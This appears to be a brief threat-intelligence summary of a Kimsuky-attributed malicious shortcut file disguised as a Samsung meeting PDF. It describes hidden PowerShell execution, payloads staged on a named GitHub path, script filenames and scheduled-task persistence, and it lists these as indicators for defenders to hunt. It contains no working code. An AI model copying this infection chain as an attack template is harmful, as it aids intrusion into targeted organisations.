A Kimsuky-attributed LNK masquerades as a Samsung Electronics meeting-related PDF and launches hidden PowerShell to decode and run a temporary script. The infection chain downloads a decoy PDF and additional scripts from raw.githubusercontent.com under the entire73/leedohun path, stores payloads such as chrome.ps1, temp.ps1, and system_first.ps1 under temporary or AppData locations, and registers a scheduled task for persistence. The lure content references Samsung Global Public Affairs meeting topics around U.S.-China relations, Indo-Pacific strategy, tariffs, and Korean security cooperation, suggesting interest in policy and external-affairs targets. The use of GitHub raw content, a hard-coded GitHub token, hidden PowerShell execution, and recurring scheduled-task execution gives defenders concrete behavioral and infrastructure indicators to hunt.